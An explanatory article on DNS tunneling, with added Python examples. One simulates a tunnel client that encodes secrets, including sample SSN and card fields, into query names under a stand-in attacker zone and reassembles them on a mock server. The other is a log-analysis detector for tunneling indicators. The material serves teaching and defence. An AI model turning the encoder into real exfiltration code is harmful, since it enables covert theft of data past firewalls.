Our internet world can only exist thanks to the DNS protocol, one of the oldest protocols on the internet. If the DNS service goes down, network services simply stop working. However, DNS has also become a popular target for today's attackers and is regularly subjected to various attacks, such as DNS tunneling.
DNS tunneling: technique and side effects
The DNS protocol is the equivalent of a phone book: you only need to know the domain name, and DNS gives you the IP address you need to reach the website. DNS tunneling is a misuse of that protocol. Instead of resolving names, the attacker encodes arbitrary data inside DNS queries and responses, usually with the aim of performing data exfiltration or carrying command-and-control traffic. For that purpose, attackers exploit a weakness of DNS that lies in its open nature: a recursive resolver will forward a query for any name under an attacker-controlled domain to that domain's authoritative server, so data hidden in the query reaches the attacker even when no other outbound traffic is allowed.
In order to perform DNS tunneling, attackers use the protocol to establish a covert channel (a tunnel) between a compromised host inside the network and a server they control, through which they pull out sensitive information for malicious purposes. The client side of the tunnel is usually malware running on the compromised machine. Any piece of information held by attackers has a certain value: it can be used by "hacktivists" trying to steal sensitive information for social or political purposes, or simply to commit fraud by stealing Social Security numbers, credit card numbers or email addresses.
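The mechanism described above, as an added example that is not code from the original article or from any real tunneling tool: the client side chops a secret into chunks and hides each one in a query name under the attacker's zone, and the attacker's authoritative server reassembles the chunks from the queries it receives. The zone name t.example.com, the chunk size and the sample payload are assumptions for illustration; the authoritative server is simulated in-process and nothing is sent on the network. Real tools use their own encodings, but the layout (a sequence label, an encoded chunk, the attacker's zone) is the same.

```python
"""Added example, not code from the original article: DNS tunneling mechanism,
simulated in-process. TUNNEL_ZONE, CHUNK and the sample payload are constructed
for illustration; no network traffic is generated."""
import base64

TUNNEL_ZONE = "t.example.com"  # assumed attacker-controlled zone; its
                               # authoritative name server is the attacker's
MAX_LABEL = 63                 # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                 # practical maximum for a full name
CHUNK = 30                     # 30 bytes -> 48 base32 chars, no '=' padding


def encode_chunks(data: bytes, chunk_size: int = CHUNK) -> list[str]:
    """Client side (the malware): turn the secret into a list of query names.

    Base32 is used rather than base64 because DNS names are case-insensitive
    and some resolvers randomise the case of the query (0x20 encoding), which
    would corrupt base64. The leading sequence-number label makes every name
    unique, so no cache can answer it and the query must be forwarded to the
    attacker's server; it also lets the receiver reorder out-of-order arrivals.
    """
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_size)):
        chunk = data[offset:offset + chunk_size]
        label = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        if len(label) > MAX_LABEL:
            raise ValueError("chunk too large for a single label")
        name = f"{seq}.{label}.{TUNNEL_ZONE}"
        if len(name) > MAX_NAME:
            raise ValueError("query name too long")
        names.append(name)
    return names


def decode_chunks(names) -> bytes:
    """Server side (the attacker's authoritative name server).

    It receives every query for *.t.example.com that any recursive resolver
    in the world forwards to it, whichever network the query started in.
    """
    parts = {}
    suffix = "." + TUNNEL_ZONE
    for name in names:
        if not name.lower().endswith(suffix):
            continue  # an ordinary lookup for another zone; not ours
        seq, label = name[: -len(suffix)].split(".", 1)
        label = label.upper() + "=" * (-len(label) % 8)  # restore padding
        parts[int(seq)] = base64.b32decode(label)
    return b"".join(parts[k] for k in sorted(parts))


def exfiltrate(secret: bytes) -> bytes:
    """Round trip. A resolver log would only ever show the names produced by
    encode_chunks(), each looking like an ordinary A or TXT lookup."""
    names = encode_chunks(secret)
    # In a real attack each name is resolved by the victim's stub resolver and
    # forwarded upstream; here the list goes straight to the simulated server.
    return decode_chunks(names)


if __name__ == "__main__":
    # Constructed sample payload
    secret = b"customer 0001;ssn=000-00-0000;card=0000000000000000\n" * 3
    for n in encode_chunks(secret)[:2]:
        print(n)
    print(exfiltrate(secret) == secret)
```

Note what a firewall sees: nothing but UDP/53 traffic from the internal resolver to the outside, which is the traffic every network allows. The only observable difference from normal lookups is in the names themselves, which is why detection has to look inside the queries.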
The effects of such attacks can be both long-lasting and damaging, not only for companies for which customer confidentiality is a crucial element. Not all network administrators are aware of the technique, and many do not know how to stop it; DNS tunneling passes through almost all firewalls, because outbound DNS is nearly always permitted. As a consequence, DNS tunneling can lead to serious consequences, including loss of revenue, customer defection and deterioration of brand image.
It is indeed difficult to distinguish a legitimate DNS query from a tunneling query, which is why DNS tunneling still remains an overlooked threat, often ignored by organisations.
Defending yourself against DNS data exfiltration
DNS tunneling is, of course, not the only DNS-based attack. Among the best known are cache poisoning (corrupting the data in a resolver's cache so that it hands out attacker-chosen answers) and the phantom domain attack (in which multiple "phantom" domains are set up whose servers answer slowly or not at all, tying up the resolver's resources).
IT administrators should be aware of the risks of data exfiltration. Cyber-attacks such as DNS tunneling have become very common over the past few years, and the general-purpose security tools that most organisations use are ineffective against them. Adopting an effective DNS security solution is the best option to protect your network. It should include:
- A tool that identifies data exfiltration as it happens and thwarts the attack;
- A blacklist of malicious destinations known to be used for data exfiltration, in order to prevent future data theft;
- Real-time monitoring of network traffic, able to closely examine DNS queries and immediately detect abnormal activity;
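The kind of query inspection the first and third items call for, as an added example that is not the article's own code or any vendor's product: heuristics run over resolver query logs that flag a (source host, domain) pair when several independent indicators coincide. The log lines, thresholds and domain names are constructed for illustration, and the registered domain is taken naively as the last two labels where a real tool would consult the Public Suffix List.

```python
"""Added example, not from the original article: tunneling indicators over
resolver query logs. SAMPLE_LOG, the thresholds and all domain names are
constructed for illustration."""
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character: English-like labels score roughly 2-3,
    base32/hex-encoded data roughly 3.5 and above."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def query_features(qname: str):
    """Split a name into the registered domain (assumption: last two labels)
    and the subdomain part, plus the two per-query indicators."""
    labels = qname.lower().rstrip(".").split(".")
    registered = ".".join(labels[-2:])
    subdomain = ".".join(labels[:-2])
    longest = max(len(label) for label in labels)
    return registered, subdomain, longest, shannon_entropy(subdomain.replace(".", ""))


def analyse(log, max_label=40, min_entropy=3.5, max_unique_subs=20):
    """Aggregate per (source host, registered domain) and flag a flow only when
    at least two indicators trip. A single indicator is too noisy on its own:
    CDNs, anti-spam and software-update lookups also use long, random-looking
    labels, and TXT queries are normal for SPF/DKIM/DMARC."""
    flows = defaultdict(lambda: {"queries": 0, "subs": set(),
                                 "long": 0, "entropy": 0, "txt_null": 0})
    for src, qname, qtype in log:
        reg, sub, longest, ent = query_features(qname)
        f = flows[(src, reg)]
        f["queries"] += 1
        f["subs"].add(sub)                      # unique names defeat caching
        f["long"] += int(longest >= max_label)  # long labels carry payload
        f["entropy"] += int(ent >= min_entropy)
        f["txt_null"] += int(qtype in ("TXT", "NULL"))  # roomy reply types
    flagged = {}
    for key, f in flows.items():
        n = f["queries"]
        reasons = []
        if len(f["subs"]) >= max_unique_subs:
            reasons.append(f"{len(f['subs'])} unique subdomains")
        if f["long"] / n >= 0.5:
            reasons.append(f"labels of {max_label}+ chars in most queries")
        if f["entropy"] / n >= 0.5:
            reasons.append("high-entropy labels in most queries")
        if f["txt_null"] / n >= 0.5:
            reasons.append("mostly TXT/NULL queries")
        if len(reasons) >= 2:
            flagged[key] = reasons
    return flagged


def _tunnel_name(i: int) -> str:
    # Constructed: a sequence label plus 48 hex chars stand in for an encoded chunk
    return f"{i}.{hashlib.sha256(str(i).encode()).hexdigest()[:48]}.t.example.net"


# Constructed resolver log: (source host, query name, query type)
SAMPLE_LOG = [
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "mail.example.com", "MX"),
    ("10.0.0.5", "_dmarc.example.com", "TXT"),
    ("10.0.0.5", "cdn.static.example.org", "A"),
    ("10.0.0.9", "a3f8c2e1.cdn.example.org", "A"),
] + [("10.0.0.7", _tunnel_name(i), "TXT") for i in range(25)]


if __name__ == "__main__":
    for (src, domain), reasons in analyse(SAMPLE_LOG).items():
        print(f"{src} -> {domain}: {', '.join(reasons)}")
```

Tune the thresholds against a baseline of your own resolver logs before alerting on them, and keep the per-flow aggregation: a tunnel is recognisable mostly by the volume of distinct names it sends to one domain, which no single query reveals.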
Organisations should deploy the tools suited to their environment and make sure their network is effectively protected from these threats, especially data theft. IT administrators should remain vigilant and provide a safe and reliable network for their users.